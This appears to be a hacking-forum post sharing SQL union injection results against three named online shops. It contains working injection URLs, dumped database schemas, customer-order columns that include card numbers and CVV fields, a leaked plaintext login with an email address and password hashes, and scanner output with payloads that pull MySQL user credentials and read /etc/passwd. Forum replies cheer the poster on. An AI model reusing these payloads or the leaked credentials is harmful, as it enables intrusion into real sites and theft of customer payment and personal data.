Lam kenal...

Host Information

Server = Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
Version = 5.0.51a-3ubuntu5.4
Powered by = PHP/5.2.4-2ubuntu5.6
Attack Type = SQL Union Injection
Current User = neil@localhost
Current Database = camp
Supports Union = yes
Union Columns = 1

Url| http://www.campingandcampsites.co.uk/shop/categories.php?catID=14744

Vuln: http://www.campingandcampsites.co.uk/shop/categories.php?catID=14744+and+1=0+ Union Select UNHEX(HEX([visible]))

Comment: --

Visible Column: 1

Hexed: True

Cookie:

Keyword:

Param:

Database:camp

information_schema
camp
mysql

Tables:users
ZLUM_Category
ZLUM_CategoryBlock
ZLUM_CategoryRoleBlock
ZLUM_Comment
ZLUM_Discussion
ZLUM_DiscussionUserWhisperFrom
ZLUM_DiscussionUserWhisperTo
ZLUM_IpHistory
ZLUM_Role
ZLUM_Style
ZLUM_User
ZLUM_UserBookmark
ZLUM_UserDiscussionWatch
ZLUM_UserRoleHistory
admin_prefs
article_comments
article_imgs
articles
campsites
counties
favourites
img_captions
invoices
link_log
news
postcode_cache
reviews
site_to_user
stats
support_messages
support_tickets
test_table
tf_categories
tf_shop
transaction_log
users
view_log
weather
zphpbb_acl_groups
zphpbb_acl_options
zphpbb_acl_roles
zphpbb_acl_roles_data
zphpbb_acl_users
zphpbb_attachments
zphpbb_banlist
zphpbb_bbcodes
zphpbb_bookmarks
zphpbb_bots
zphpbb_config
zphpbb_confirm
zphpbb_disallow
zphpbb_drafts
zphpbb_extension_groups
zphpbb_extensions
zphpbb_forums
zphpbb_forums_access
zphpbb_forums_track
zphpbb_forums_watch
zphpbb_groups
zphpbb_icons
zphpbb_lang
zphpbb_log
zphpbb_moderator_cache
zphpbb_modules
zphpbb_poll_options
zphpbb_poll_votes
zphpbb_posts
zphpbb_privmsgs
zphpbb_privmsgs_folder
zphpbb_privmsgs_rules
zphpbb_privmsgs_to
zphpbb_profile_fields
zphpbb_profile_fields_data
zphpbb_profile_fields_lang
zphpbb_profile_lang
zphpbb_ranks
zphpbb_reports
zphpbb_reports_reasons
zphpbb_search_results
zphpbb_search_wordlist
zphpbb_search_wordmatch
zphpbb_sessions
zphpbb_sessions_keys
zphpbb_sitelist
zphpbb_smilies
zphpbb_styles
zphpbb_styles_imageset
zphpbb_styles_imageset_data
zphpbb_styles_template
zphpbb_styles_template_data
zphpbb_styles_theme
zphpbb_topics
zphpbb_topics_posted
zphpbb_topics_track
zphpbb_topics_watch
zphpbb_user_group
zphpbb_users
zphpbb_warnings
zphpbb_words
zphpbb_zebra

Columns: Table users
username
password
forename
surname
email



username:password:forename:surname:email:
Neil:denver:Neil:Emrich:neil@campingandcampsites.co.uk:
test_neil:52e17699cd757e43021c053b456014c6::::
:d41d8cd98f00b204e9800998ecf8427e::::

Host Information

Server = Microsoft-IIS/6.0
Version = 5.1.34-community
Powered by = PHP/5.2.9-2,ASP.NET
Attack Type = SQL Union Injection
Current User = radiant@localhost
Current Database =
Supports Union = yes
Union Columns = 1

Url| http://www.radiantheating.com/categories.php?catID=3

Vuln: http://www.radiantheating.com/categories.php?catID=3+and+1=0+ Union Select UNHEX(HEX([visible]))

Comment: --

Visible Column: 1

Hexed: True

Cookie:

Keyword:

Param:

Database:radiant

information_schema
radiant
test

Tables:customer_orders
accessories
additional_cat_categories
additional_categories
additional_prod_categories
admin_users
categories
category_sites
customer_carts
customer_orders
customer_orders_carts
customer_saved_cart_contents
customer_saved_carts
customers
email_carts
files
newsletter
product_backup
product_backup2
product_options
products
products_photos
products_reviews
products_userphotos
sessions
settings
settings_lizeye
settings_pex
settings_rvpart
sites_index
vendors

Columns: Table customer_orders
phpsessid
submitted
archive
billed
shipped
comments
billingemail
billingtitle
billingfirst
billingmiddle
billinglast
billingsuffix
billingcompany
billingaddress1
billingaddress2
billingcity
billingstate
billingzip
billingcountry
billingphone
sameinfo
shippingtitle
shippingfirst
shippingmiddle
shippinglast
shippingsuffix
shippingcompany
shippingaddress1
shippingaddress2
shippingcity
shippingstate
shippingzip
shippingcountry
shippingphone
paymenttype
cardnumber
nameoncard
company
expmonth
expyear
shippingmethod
shipping
site
customer
heardfrom
cvs

Host Information

Server = Apache/2.2.3 (Debian) PHP/4.4.4-8+etch6 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
Version = 5.0.32-Debian_7etch10-log
Powered by = PHP/4.4.4-8+etch6
Attack Type = SQL Union Injection
Current User = web115_u1@localhost
Current Database = web115_db1
Supports Union = yes
Union Columns = 5

Url| http://www.iiiseasons.com/shopping.php?command=showitem&id=431

Vuln: http://www.iiiseasons.com/shopping.php?command=showitem&id=431+and+1=0+ Union Select 1 , UNHEX(HEX([visible])) ,3,4,5

Comment: --

Visible Column: 2

Hexed: True

Cookie:

Keyword:

Param:

Database:web115_db1

information_schema
common_db
web115_db1

Tables:orders
address
address_type
admin
admin_activity_log
backgrounds
categories
categories_description
client
countries
credit_card
dynamic_documents
orders
orders_products
orders_status
orders_status_history
payment_creditcard
payment_module
products
products_description
products_to_categories
products_variation
rma_details
rma_master
save_categories
save_categories_description
save_products_to_categories
shipping_module

Columns: Table orders
customers_id
customers_name
customers_company
customers_street_address
customers_suburb
customers_city
customers_postcode
customers_state
customers_country
customers_telephone
customers_email_address
customers_address_format_id
delivery_name
delivery_company
delivery_street_address
delivery_suburb
delivery_city
delivery_postcode
delivery_state
delivery_country
delivery_address_format_id
billing_name
billing_company
billing_street_address
billing_suburb
billing_city
billing_postcode
billing_state
billing_country
billing_address_format_id
payment_method
payment_module_code
shipping_method
shipping_module_code
coupon_code
cc_type
cc_owner
cc_number
cc_expires
cc_cvv
last_modified
date_purchased
orders_status
orders_date_finished
currency
currency_value
order_total
order_tax
ip_address

Nice

Code:

[+] URL: http://www.campingandcampsites.co.uk/shop/categories.php?catID=14744+AND+1=2+UNION+SELECT+darkc0de--
[+] Evasion Used: "+" "--"
[+] 09:52:21
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
   Database: camp
   User: neil@localhost
   Version: 5.0.51a-3ubuntu5.4

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://www.campingandcampsites.co.uk/shop/categories.php?catID=14744+AND+1=2+UNION+SELECT+concat(user,0x3a,password)+FROM+mysql.user--

[+] Do we have Access to Load_File: Yes <-- w00t w00t
[!] http://www.campingandcampsites.co.uk/shop/categories.php?catID=14744+AND+1=2+UNION+SELECT+load_file(0x2f6574632f706173737764)--

[-] 09:52:23
[-] Total URL Requests 3
[-] Done

Don't forget to check schemafuzzlog.txt


C:Python26>

Thanks bro....

nice keep up...
welc0me to devilzc0de brotha...